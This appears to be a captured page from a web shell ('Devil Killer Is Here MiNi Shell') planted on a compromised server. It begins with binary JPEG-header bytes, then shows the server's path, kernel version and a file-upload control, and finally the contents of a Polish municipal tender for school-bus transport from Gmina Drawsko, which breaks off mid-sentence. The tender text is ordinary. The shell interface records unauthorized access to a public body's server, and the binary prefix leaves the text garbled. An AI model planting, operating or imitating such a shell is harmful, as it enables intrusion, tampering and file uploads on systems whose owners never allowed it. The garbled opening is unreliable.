JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20240805/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20240805/0044550601-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Dowozy i odwozy dzieci szkolnych do Szkoły Podstawowej w Chełście, Piłce, Zespołu Szkół w Drezdenku i Szkoły Podstawowej nr 3 w Trzciance w roku szkolnym 2024-2025, 2025-2026 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Drawsko</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 570791075</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Powstańców Wielkopolskich 121</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Drawsko</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">64-733</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL411 - Pilski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">672569128</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">urzad@gminadrawsko.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.gminadrawsko.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dowozy i odwozy dzieci szkolnych do Szkoły Podstawowej w Chełście, Piłce, Zespołu Szkół w Drezdenku i Szkoły Podstawowej nr 3 w Trzciance w roku szkolnym 2024-2025, 2025-2026 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6d145be8-cb82-4b96-a635-f1ad24cdc3ad</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00445506</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-08-05</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00058986/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Dowozy i odwozy dzieci szkolnych do Szkoły Podstawowej w Chełście, Piłce, Zespołu Szkół w Drezdenku i Szkoły Podstawowej nr 3 w Trzciance w roku szkolnym 2024-2025, 2025-2026</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/gminadrawsko. <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/gminadrawsko</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W niniejszym postępowaniu komunikacja Zamawiającego z Wykonawcami odbywa się1.1. Wypełniony i podpisany formularz oferty (uzupełniony w zakresie Części, na które<br/>składana jest oferta) – Załącznik nr 1 do SWZ;<br/>1.2. oświadczenie, o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału<br/>w postępowaniu, o którym mowa w art. 125 ust. 1 ustawy Pzp. – Załącznik nr 3a<br/>do SWZ;<br/>1.3. oświadczenie podmiotu udostępniającego zasoby o niepodleganiu wykluczeniu<br/>oraz spełnianiu warunków udziału w postępowaniu, o którym mowa w art. 125<br/>ust. 5 ustawy Pzp. – Załącznik nr 3b do SWZ (jeżeli dotyczy);<br/>1.4. w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana<br/>do jego reprezentowania, zamawiający żąda od wykonawcy odpisu lub informacji<br/>z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności<br/>Gospodarczej lub innego właściwego rejestru;<br/>1.5. Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa<br/>w pkt 1.4, jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych<br/>i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające<br/>dostęp do tych dokumentów;<br/>1.6. jeżeli w imieniu wykonawcy działa osoba, której umocowanie do jego<br/>reprezentowania nie wynika z dokumentów, o których mowa w pkt 1.4,<br/>Zamawiający żąda od Wykonawcy pełnomocnictwa lub innego dokumentu<br/>potwierdzającego umocowanie do reprezentowania wykonawcy;<br/>1.7. pkt 1.6 stosuje się odpowiednio do osoby działającej w imieniu wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia publicznego;<br/>1.8. pkt 1.4.-1.6. stosuje się odpowiednio do osoby działającej w imieniu podmiotu<br/>udostępniającego zasoby na zasadach określonych w art. 118 ustawy lub<br/>Podwykonawcy niebędącego podmiotem udostępniającym zasoby na takich<br/>zasadach.<br/>1.9. zobowiązanie podmiotu udostępniającego zasoby (jeżeli dotyczy);<br/>1.10. oświadczenie, z którego wynika, które roboty bu<br/><br/>przy użyciu środków komunikacji elektronicznej, za pośrednictwem Platformy<br/>zakupowej, działającej pod adresem: https://platformazakupowa.pl/pn/gminadrawsko<br/>2. Zaleca się, aby przed rozpoczęciem wypełniania Formularzu składania oferty<br/>wykonawca zalogował się do systemu, a jeżeli nie posiada konta, założył bezpłatne<br/>konto. W przeciwnym wypadku wykonawca będzie miał ograniczone funkcjonalności,<br/>np. brak widoku wiadomości prywatnych od zamawiającego w systemie lub wycofania<br/>oferty bez kontaktu z Centrum Wsparcia Klienta.<br/>3. Występuje limit objętości plików lub spakowanych folderów w zakresie całej oferty do<br/>ilości 10 plików lub spakowanych folderów przy maksymalnej wielkości 150 MB.<br/>4. Postępowanie o udzielenie zamówienia prowadzi się w języku polskim.<br/>5. W postępowaniu o udzielenie zamówienia korespondencja elektroniczna (inna niż oferta<br/>Wykonawcy) odbywa się również za pomocą poczty elektronicznej na adres e-mail:<br/>urzad@gminadrawsko.pl<br/>6. Zamawiający nie ponosi odpowiedzialności z tytułu nieotrzymania przez Wykonawcę<br/>informacji związanych z prowadzonym postępowaniem, w przypadku wskazania przez<br/>Wykonawcę w ofercie np. błędnego adresu poczty elektronicznej.<br/>7. Szczegółowe informacje dotyczące sposobu komunikowania się Zamawiającego<br/>z Wykonawcami zawarte są w „Instrukcji dla Wykonawców platformazakupowa.pl” oraz<br/>„Regulamin platformazakupowa.pl dla Użytkowników (Wykonawców)”.<br/>8. Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych<br/>kopii dokumentów lub oświadczeń musi być zgody z wymaganiami określonymi<br/>w rozporządzeniu Prezesa Rady Ministrów z dnia 31 grudnia 2020 r. w sprawie sposobu<br/>sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów<br/>elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie (Dz. U. z 2020 r., poz. 2452) oraz rozporządzeniu<br/>Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie<br/>podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich<br/>może żądać zamawiający od wykonawcy (Dz. U. z 2020 r., poz. 2415).</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">www.platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/gminadrawsko</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">RODO (obowiązek informacyjny): Zgodnie z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. 119 z04.05.2016, str. 1) – zwane dalej RODO, informuję, że:<br/>1. Administratorem Państwa danych osobowych jest Wójt Gminy Drawsko, ul. Powstańców Wielkopolskich 121, 64-733 Drawsko.<br/>2. Administrator wyznaczył inspektora ochrony danych, z którym mogą się Państwo skontaktować poprzez adres e-mail:<br/>urzad@gminadrawsko.pl, we wszystkich sprawach dotyczących przetwarzania danych osobowych oraz korzystania z praw<br/>związanych z przetwarzaniem danych.<br/>3. Państwa dane osobowe przetwarzane będą na podstawie obowiązujących przepisów prawa, zawartych umów lub na podstawie<br/>udzielonej zgody, w celu wypełnienia obowiązków prawnych ciążących na administratorze danych, wynikających z zadań gminy – w<br/>oparciu o przepisy ustawy Prawo zamówień publicznych (Dz. U. z 2019 poz. 2019 ze zm. – dalej uPzp) oraz aktów wykonawczych<br/>do uPzp, związanych z niniejszym postępowaniem o udzielenie zamówienia publicznego prowadzonym w trybie przetargu<br/>nieograniczonego i realizacji umowy w sprawie zamówienia publicznego, zawarcia i realizacji umowy z osobą, której dane dotyczą,<br/>określonym w treści zgody.<br/>4. Podanie danych osobowych jest wymagane na podstawie przepisów prawa.<br/>5. Państwa dane osobowe będą przekazywane innym organom publicznym i podmiotom wyłącznie na podstawie obowiązujących<br/>przepisów prawa.<br/>6. Odbiorcami Państwa danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 18 oraz art. 74 ustawy Pzp, dostawcy systemu elektronicznego obiegu dokumentów, poczty elektronicznej, usług IT<br/>oraz podmioty wspierające w świadczeniu usług drogą elektroniczną, organy władzy publicznej oraz podmioty wykonujące zadania<br/>publiczne lub działające na zlecenie organów władzy publicznej - w zakresie i w celach, które wynikają z przepisów powszechnie<br/>obowiązującego prawa, inne podmioty, które przetwarzają dane osobowe na podstawie umów podpisanych z administratorem, oraz<br/>podmioty, które wystąpią o informacje na podstawie ustawy o dostępie do informacji publicznej.<br/>7. Nie podanie przez Państwo danych osobowych wyłącza możliwość realizacji celów określonych w pkt. 3.<br/>8. Państwa dane osobowe przetwarzane będą przez okres niezbędny do realizacji celów określonych w pkt. 3, a po tym czasie przez<br/>okres wynikający z obowiązujących przepisów prawa, w szczególności ustawy o narodowym zasobie archiwalnym i archiwach oraz<br/>aktach wykonawczych do tej ustawy, t.j. 5 lat. W przypadku projektów dofinansowanych z budżetu Unii Europejskiej – okres<br/>przetwarzania wynikał będzie z zasad określonych w Wytycznych w zakresie kwalifikowalności wydatków w ramach Europejskiego<br/>Funduszu Rozwoju Regionalnego, Europejskiego Funduszu Społecznego, Funduszu Spójności oraz Programu Operacyjnego<br/>Infrastruktura i Środowisko na lata 2014-2020.<br/>9. W odniesieniu do Państwa danych osobowych nie będą podejmowane w sposób zautomatyzowany, w tym nie będą profilowane.<br/>10. W zawiązku z przetwarzaniem Państwa danych osobowych jesteście Państwo uprawnieni do:<br/>1) dostępu do swoich danych osobowych,<br/>W przypadku, gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1 – 3 RODO, wymagałoby niewspółmiernie dużego wysiłku,<br/>Zamawiający może żądać od osoby, której dane dotyczą wskazania dodatkowych informacji mający na celu sprecyzowanie żądania,<br/>w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">wniesienia żądania ograniczenia przetwarzania danych osobowych (prawo do<br/>ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków<br/>ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii<br/>Europejskiej lub państwa członkowskiego),<br/>4) wniesienia skargi do organu nadzorczego – Prezesa Urzędu Ochrony Danych Osobowych, w przypadku gdy przetwarzanie<br/>danych osobowych naruszyłoby przepisy ogólnego rozporządzenia o ochronie danych osobowych.<br/>11. Nie przysługuje Państwu prawo:<br/>- do usunięcia danych osobowych;<br/>- do przenoszenia danych osobowych;<br/>- sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania danych osobowych jest art. 6 ust.1 lit. c<br/>RODO.<br/>12. W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa art. 18 ust. 1<br/>rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">GK-ZP.271.7.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">5</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część I <br/>Dowóz na trasie: Chełst Szkoła Podstawowa – Kawczyn-Pełcza-Kawczyn-Chełst Szkoła Podstawowa.<br/>Chełst Szkoła Podstawowa – Kwiejce – Kamiennik - Chełst Szkoła Podstawowa<br/>Chełst Szkoła Podstawowa – Moczydła – Chełst Szkoła Podstawowa<br/> <br/>Odwóz na trasie: : Chełst Szkoła Podstawowa – Kawczyn-Pełcza-Kawczyn-Chełst Szkoła Podstawowa.<br/>Chełst Szkoła Podstawowa – Kwiejce – Kamiennik - Chełst Szkoła Podstawowa<br/>Chełst Szkoła Podstawowa – Moczydła – Chełst Szkoła Podstawowa. <br/>Ok. 117 km dziennie </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 300000,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60112000-6 - Usługi w zakresie publicznego transportu drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Wykonawca jest zobowiązany do wypełnienia „Formularza oferty” w zakresie części<br/>zamówienia, na które składa ofertę.<br/>2. Cena podana w Formularzu ofertowym (dla każdej z części – Załącznik nr 1 do SWZ)<br/>musi uwzględniać wszystkie koszty realizacji przyszłej umowy. Cena za 1 km musi<br/>obejmować cenę usługi dowozu uczniów oraz cenę usługi opiekunów.<br/>3. Zamawiający wymaga podania ceny za 1 km (dla każdej części).<br/>4. Rozliczenia pomiędzy Zamawiającym a Wykonawcą zostaną dokonane za faktycznie<br/>zrealizowane usługi w sposób określony umową zgodnie z ceną za 1 km dowozu<br/>uczniów oraz usługi opiekunów.<br/>5. Cena oferty dla każdej z części musi być podana w PLN (brutto) cyfrowo. Cenę oferty<br/>należy obliczyć i zapisać zgodnie z formularzem ofertowym.<br/>6. Cena oferty w przypadku Wykonawców mających siedzibę lub miejsce zamieszkania na<br/>terytorium Rzeczypospolitej Polskiej jest ceną brutto, wyrażoną w PLN, obejmującą<br/>wszelkie koszty związane z wykonaniem zamówienia, opłaty, podatki (w tym<br/>podatek od towarów i usług – VAT) i wszystkie inne koszty o jakimkolwiek<br/>charakterze, które mogą powstać w związku z realizacją przedmiotu zamówienia.<br/>7. Cena oferty w przypadku Wykonawców nie mających siedziby lub miejsca zamieszkania<br/>na terytorium Rzeczypospolitej Polskiej jest ceną netto, wyrażoną w PLN (nie<br/>uwzględniającą podatku od towarów i usług obowiązującego w Polsce), obejmującą<br/>wszelkie koszty związane z wykonaniem zamówienia, wszystkie opłaty, cła,<br/>podatki (bez podatku od towarów i usług VAT) i wszystkie inne koszty<br/>o jakimkolwiek charakterze, które mogą powstać w związku z realizacją<br/>przedmiotu zamówienia.<br/>8. Cena oferty określona przez Wykonawcę zostanie ustalona na okres ważności umowy<br/>i nie będzie podlegała zmianom, z wyłączeniem sytuacji opisanych w umowie<br/>o zamówienie publiczne.<br/>9. Cena (w danej części zamówienia) może być tylko jedna, nie dopuszcza się<br/>wariantowości cen.<br/>10. Cena oferty nie będzie podlegać okresowej waloryzacji przez okres obowiązywania<br/>umowy.<br/>11. Zgodnie z powyższymi uregulowaniami, ostateczna cena zadeklarowana w ofercie musi<br/>zawierać prawidłową stawkę podatku VAT oraz musi być wyrażona w złotych polskich<br/>z dokładnością do setnych części złotego, tj. do drugiego miejsca po przecinku.<br/>12. Wszelkie przyszłe rozliczenia między Zamawiającym a Wykonawcą dokonywane będą<br/>w złotych polskich.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dowóz na trasie: Piłka Szkoła Podstawowa – Marylin – Piłka Szkoła Podstawowa<br/>Piłka Szkoła Podstawowa – Kwiejce Nowe – Borzysko Młyn – Piłka Szkoła Podstawowa<br/><br/>Odwóz na trasie: Piłka Szkoła Podstawowa – Marylin – Piłka Szkoła Podstawowa<br/>Piłka Szkoła Podstawowa – Borzysko Młyn - Kwiejce Nowe – Piłka Szkoła Podstawowa<br/>Ok. 108 km dziennie </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 100000,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60112000-6 - Usługi w zakresie publicznego transportu drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Wykonawca jest zobowiązany do wypełnienia „Formularza oferty” w zakresie części<br/>zamówienia, na które składa ofertę.<br/>2. Cena podana w Formularzu ofertowym (dla każdej z części – Załącznik nr 1 do SWZ)<br/>musi uwzględniać wszystkie koszty realizacji przyszłej umowy. Cena za 1 km musi<br/>obejmować cenę usługi dowozu uczniów oraz cenę usługi opiekunów.<br/>3. Zamawiający wymaga podania ceny za 1 km (dla każdej części).<br/>4. Rozliczenia pomiędzy Zamawiającym a Wykonawcą zostaną dokonane za faktycznie<br/>zrealizowane usługi w sposób określony umową zgodnie z ceną za 1 km dowozu<br/>uczniów oraz usługi opiekunów.<br/>5. Cena oferty dla każdej z części musi być podana w PLN (brutto) cyfrowo. Cenę oferty<br/>należy obliczyć i zapisać zgodnie z formularzem ofertowym.<br/>6. Cena oferty w przypadku Wykonawców mających siedzibę lub miejsce zamieszkania na<br/>terytorium Rzeczypospolitej Polskiej jest ceną brutto, wyrażoną w PLN, 